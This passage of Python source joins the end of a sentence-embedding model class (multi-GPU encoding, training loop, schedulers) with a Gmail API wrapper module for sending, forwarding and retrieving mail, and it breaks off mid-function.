all_embeddings = np.asarray([emb.cpu().detach().numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None, encode_batch_size: int = 32):
"""
Starts multi process to process the encode with several, independent process.
This methos is recommend if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:param encode_batch_size: Batch size for each process when calling encode
:return: Returns a dict with the target processes, an input queue and and output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logging.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logging.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue, encode_batch_size), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], is_pretokenized: bool = False):
"""
This method allows to run encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param is_pretokenized: If true, no tokenization will be applied. It is expected that the input sentences are list of ints.
:return: Numpy matrix with all embeddings
"""
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logging.info("Chunk data into packages of size {}".format(chunk_size))
if is_pretokenized:
sentences_tokenized = sentences
else:
sentences_tokenized = map(self.tokenize, sentences)
input_queue = pool['input']
num_chunks = 0
chunk = []
for sentence in sentences_tokenized:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([num_chunks, chunk])
num_chunks += 1
chunk = []
if len(chunk) > 0:
input_queue.put([num_chunks, chunk])
num_chunks += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(num_chunks)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue, encode_batch_size):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, is_pretokenized=True, show_progress_bar=False, convert_to_numpy=True, batch_size=encode_batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length for input the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
return self._last_module().get_sentence_embedding_dimension()
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
logging.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0][0])
labels = []
paired_texts = [[] for _ in range(num_texts)]
max_seq_len = [0] * num_texts
for tokens, label in batch:
labels.append(label)
for i in range(num_texts):
paired_texts[i].append(tokens[i])
max_seq_len[i] = max(max_seq_len[i], len(tokens[i]))
features = []
for idx in range(num_texts):
max_len = max_seq_len[idx]
feature_lists = {}
for text in paired_texts[idx]:
sentence_features = self.get_sentence_features(text, max_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
#feature_lists[feature_name] = torch.tensor(np.asarray(feature_lists[feature_name]))
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
features.append(feature_lists)
return {'features': features, 'labels': torch.stack(labels)}
def smart_batching_collate_text_only(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
max_seq_len = max([len(text) for text in batch])
feature_lists = {}
for text in batch:
sentence_features = self.get_sentence_features(text, max_seq_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
return feature_lists
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
output_path_ignore_not_empty: bool = False,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from o up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param output_path_ignore_not_empty: By default, training will stop if output_path is not empty. If set to true, this error will be ignored and training proceeds.
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient normalization.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
if not output_path_ignore_not_empty and len(os.listdir(output_path)) > 0:
raise ValueError("Output directory ({}) already exists and is not empty.".format(
output_path))
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
device = self._target_device
for loss_model in loss_models:
loss_model.to(device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
#logging.info("Restart data_iterator")
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = batch_to_device(data, self._target_device)
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
-1, callback)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score and save_best_model:
self.save(output_path)
self.best_score = score
def _get_scheduler(self, optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that is should used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
gmail.py
|
"""
File: gmail.py
--------------
Home to the main Gmail service object. Currently supports sending mail (with
attachments) and retrieving mail with the full suite of Gmail search options.
"""
import base64
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import html
import math
import mimetypes
import os
import re
import threading
from typing import List, Optional, Union
from bs4 import BeautifulSoup
import dateutil.parser as parser
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
from simplegmail import label
from simplegmail.attachment import Attachment
from simplegmail.label import Label
from simplegmail.message import Message
class Gmail(object):
"""
The Gmail class which serves as the entrypoint for the Gmail service API.
Args:
client_secret_file: The name of the user's client secret file.
Attributes:
client_secret_file (str): The name of the user's client secret file.
service (googleapiclient.discovery.Resource): The Gmail service object.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
"https://www.googleapis.com/auth/gmail.modify",
"https://www.googleapis.com/auth/gmail.settings.basic",
]
# If you don't have a client secret file, follow the instructions at:
# https://developers.google.com/gmail/api/quickstart/python
# Make sure the client secret file is in the root directory of your app.
def __init__(
self,
client_secret_file: str = "client_secret.json",
creds_file: str = "gmail_token.json",
_creds: Optional[client.OAuth2Credentials] = None,
access_type: str = "offline",
user_id: str = "me",
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
self._labels = None
self.user_id = user_id
try:
# The file gmail_token.json stores the user's access and refresh
# tokens, and is created automatically when the authorization flow
# completes for the first time.
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(
self.client_secret_file, self._SCOPES
)
flow.params["approval_prompt"] = "force"
flow.params["access_type"] = access_type
flags = tools.argparser.parse_args([])
self.creds = tools.run_flow(flow, store, flags)
self._service = build(
"gmail", "v1", http=self.creds.authorize(Http()), cache_discovery=False
)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
"the file is in the root directory of your application. If "
"you don't have a client secrets file, go to https://"
"developers.google.com/gmail/api/quickstart/python, and "
"follow the instructions listed there."
)
@property
def service(self) -> "googleapiclient.discovery.Resource":
# Since the token is only used through calls to the service object,
# this ensure that the token is always refreshed before use.
if self.creds.access_token_expired:
self.creds.refresh(Http())
return self._service
def send_raw_message(self, message_raw64: str, user_id: str = "me") -> dict:
try:
req = (
self.service.users()
.messages()
.send(userId=user_id, body={"raw": message_raw64})
)
res = req.execute()
return res
except HttpError as error:
# Pass along the error
raise error
def forward_message(
self,
message: Message,
sender: str,
to: str,
forward_prefix="[FWD]",
tmpdir="/tmp",
) -> Message:
fpaths = message.download_attachments(tmpdir=tmpdir)
return self.send_message(
sender=sender,
to=to,
subject=f"{forward_prefix}{message.subject}",
headers= [
{"name": "Sender", "value": sender},
{"name": "On-Behalf-Of", "value": sender},
{"name": "Resent-To", "value": sender},
{"name": "ConnySender", "value": sender}
],
msg_html=message.html,
msg_plain=message.plain,
attachments=fpaths,
)
def forward_raw_message(
self,
message: Message,
to: str,
sender: str ="") -> dict:
b64_message = message.forward_body(to, sender)
return self.send_raw_message(b64_message)
def send_message(
self,
sender: str,
to: str,
subject: str = "",
msg_html: Optional[str] = None,
msg_plain: Optional[str] = None,
cc: Optional[List[str]] = None,
bcc: Optional[List[str]] = None,
attachments: Optional[List[str]] = None,
signature: bool = False,
headers: List[dict] = [],
user_id: str = "me",
) -> Message:
"""
Sends an email.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
msg_plain: The plain text alternate message of the email. This is
often displayed on slow or old browsers, or if the HTML message
is not provided.
cc: The list of email addresses to be cc'd.
bcc: The list of email addresses to be bcc'd.
attachments: The list of attachment file names.
signature: Whether the account signature should be added to the
message.
user_id: The address of the sending account. 'me' for the
default address associated with the account.
Returns:
The Message object representing the sent message.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
msg = self._create_message(
sender,
to,
subject,
msg_html,
msg_plain,
cc=cc,
bcc=bcc,
attachments=attachments,
signature=signature,
headers=headers,
user_id=user_id,
)
try:
req = self.service.users().messages().send(userId="me", body=msg)
res = req.execute()
return self._build_message_from_ref(user_id, res, "reference")
except HttpError as error:
# Pass along the error
raise error
def get_unread_inbox(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
) -> List[Message]:
"""
Gets unread messages from your inbox.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Labels that messages must match.
query: A Gmail query to match.
attachments: Accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.INBOX)
return self.get_unread_messages(user_id, labels, query)
def get_starred_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets starred messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.STARRED)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_important_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets messages marked important from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.IMPORTANT)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_unread_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets unread messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.UNREAD)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_drafts(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets drafts saved in your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.DRAFT)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_sent_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
) -> List[Message]:
"""
Gets sent messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SENT)
return self.get_messages(
user_id, labels, query, attachments, include_spam_trash
)
def get_trash_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
) -> List[Message]:
"""
Gets messages in your trash from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.TRASH)
return self.get_messages(user_id, labels, query, attachments, True)
def get_spam_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
) -> List[Message]:
"""
Gets messages marked as spam from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SPAM)
return self.get_messages(user_id, labels, query, attachments, True)
def get_messages(
self,
user_id: str = "me",
labels: Optional[List[Label]] = None,
query: str = "",
attachments: str = "reference",
include_spam_trash: bool = False,
refs_only: bool = False,
) -> Union[List[Message], List[dict]]:
"""
Gets messages from your account.
Args:
user_id: the user's email address. Default 'me', the authenticated
user.
labels: label IDs messages must match.
query: a Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels_ids = [lbl.id if isinstance(lbl, Label) else lbl for lbl in labels]
try:
response = (
self.service.users()
.messages()
.list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash,
)
.execute()
)
message_refs = []
if "messages" in response: # ensure request was successful
message_refs.extend(response["messages"])
while "nextPageToken" in response:
page_token = response["nextPageToken"]
response = (
self.service.users()
.messages()
.list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash,
pageToken=page_token,
)
.execute()
)
message_refs.extend(response["messages"])
if refs_only:
# Do not fetch messages yet
return message_refs
return self._get_messages_from_refs(user_id, message_refs, attachments)
except HttpError as error:
# Pass along the error
raise error
def create_label(self, label_name: str, user_id: str = 'me') -> Label:
"""
Create a new label
Args:
label_name: Name for the new label
user_id: The user's email address. By default, the authenticated
user.
Returns:
A Label object.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
body = {
"name": label_name,
}
try:
res = self.service.users().labels().create(
userId=user_id,
body=body
).execute()
except HttpError as error:
# Pass along the error
raise error
else:
return Label(res['name'], res['id'])
def get_label_id(self, key: str, refresh: bool = True):
if key not in self.labels:
if refresh:
self.list_labels()
return self.get_label_id(key, refresh=False)
label = self.create_label(key)
self._labels[label.name] = label.id
return self.labels[key]
@property
def labels(self):
if self._labels is None:
self._labels = self._dict_labels(self.list_labels(self.user_id))
return self._labels
def _dict_labels(self, values: List[Label]) -> dict:
return dict(map(lambda x: [x.name, x.id], values))
def list_labels(self, user_id: str = "me") -> List[Label]:
"""
Retrieves all labels for the specified user.
These Label objects are to be used with other functions like
modify_labels().
Args:
user_id: The user's email address. By default, the authenticated
user.
Returns:
The list of Label objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
try:
res = self.service.users().labels().list(userId=user_id).execute()
except HttpError as error:
# Pass along the error
raise error
else:
labels = [Label(name=x["name"], id=x["id"]) for x in res["labels"]]
self._labels = self._dict_labels(labels)
return labels
def get_message_from_ref(
self, ref: dict, user_id: str = "me", attachments: str = "reference", with_raw: bool = False):
return self._build_message_from_ref(user_id, ref, attachments, with_raw=with_raw)
def _get_messages_from_refs(
self,
user_id: str,
message_refs: List[dict],
attachments: str = "reference",
parallel: bool = True,
) -> List[Message]:
"""
Retrieves the actual messages from a list of references.
Args:
user_id: The account the messages belong to.
message_refs: A list of message references with keys id, threadId.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download'
which downloads the attachment data to store locally. Default
'reference'.
parallel: Whether to retrieve messages in parallel. Default true.
Currently parallelization is always on, since there is no
reason to do otherwise.
Returns:
A list of Message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if not message_refs:
return []
if not parallel:
return [
self._build_message_from_ref(user_id, ref, attachments)
for ref in message_refs
]
max_num_threads = 12 # empirically chosen, prevents throttling
target_msgs_per_thread = 10 # empirically chosen
num_threads = min(
math.ceil(len(message_refs) / target_msgs_per_thread), max_num_threads
)
batch_size = math.ceil(len(message_refs) / num_threads)
message_lists = [None] * num_threads
def thread_download_batch(thread_num):
gmail = Gmail(_creds=self.creds)
start = thread_num * batch_size
end = min(len(message_refs), (thread_num + 1) * batch_size)
message_lists[thread_num] = [
gmail._build_message_from_ref(user_id, message_refs[i], attachments)
for i in range(start, end)
]
threads = [
threading.Thread(target=thread_download_batch, args=(i,))
for i in range(num_threads)
]
for t in threads:
t.start()
for t in threads:
t.join()
return sum(message_lists, [])
def get_messages_from_refs(
self,
message_refs: List[dict],
user_id: str = "me",
attachments: str = "reference",
) -> List[Message]:
return self._get_messages_from_refs(user_id, message_refs, attachments)
def _build_raw_message_from_ref(self, user_id: str, message_ref: dict) -> str:
try:
# Get message RAW base64
message = (
self.service.users()
.messages()
.get(userId=user_id, id=message_ref["id"], format="raw")
.execute()
)
return message["raw"]
except HttpError as error:
# Pass along the error
raise error
def _build_message_from_raw_json(self,
message: dict,
message_raw: Optional[str] = None,
attachments: str="reference",
user_id: str="me") -> Message:
msg_id = message["id"]
thread_id = message["threadId"]
label_ids = []
if "labelIds" in message:
user_labels = {x.id: x for x in self.list_labels(user_id=user_id)}
label_ids = [user_labels[x] for x in message["labelIds"]]
snippet = html.unescape(message["snippet"])
payload = message["payload"]
headers = payload["headers"]
# Get header fields (date, from, to, subject)
date = ""
sender = ""
recipient = ""
subject = ""
cc = None
bcc = None
msg_hdrs = {}
for hdr in headers:
if hdr["name"].lower() == "date":
try:
date = str(parser.parse(hdr["value"]).astimezone())
except Exception:
date = hdr["value"]
elif hdr["name"].lower() == "from":
sender = hdr["value"]
elif hdr["name"].lower() == "to":
recipient = hdr["value"]
elif hdr["name"].lower() == "subject":
subject = hdr["value"]
elif hdr["name"].lower() == "cc":
cc = hdr["value"]
elif hdr["name"].lower() == "bcc":
bcc = hdr["value"]
msg_hdrs[hdr["name"]] = hdr["value"]
parts = self._evaluate_message_payload(
payload, user_id, message["id"], attachments
)
plain_msg = None
html_msg = None
attms = []
for part in parts:
if part["part_type"] == "plain":
if plain_msg is None:
plain_msg = part["body"]
else:
plain_msg += "\n" + part["body"]
elif part["part_type"] == "html":
if html_msg is None:
html_msg = part["body"]
else:
html_msg += "<br/>" + part["body"]
elif part["part_type"] == "attachment":
attm = Attachment(
self.service,
user_id,
msg_id,
part["attachment_id"],
part["filename"],
part["filetype"],
part["data"],
)
attms.append(attm)
return Message(
service=self.service,
creds=self.creds,
user_id=user_id,
msg_id=msg_id,
thread_id=thread_id,
recipient=recipient,
sender=sender,
subject=subject,
date=date,
snippet=snippet,
plain=plain_msg,
html=html_msg,
bcc=bcc,
cc=cc,
label_ids=label_ids,
attachments=attms,
headers=msg_hdrs,
headers_list=headers,
raw_response=message,
raw_base64=message_raw,
)
def _build_message_from_ref(
self,
user_id: str,
message_ref: dict,
attachments: str = "reference",
with_raw: bool = False,
) -> Message:
"""
Creates a Message object from a reference.
Args:
user_id: The username of the account the message belongs to.
message_ref: The message reference object returned from the Gmail
API.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
The Message object.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
message_raw = None
try:
# Get message JSON
message = (
self.service.users()
.messages()
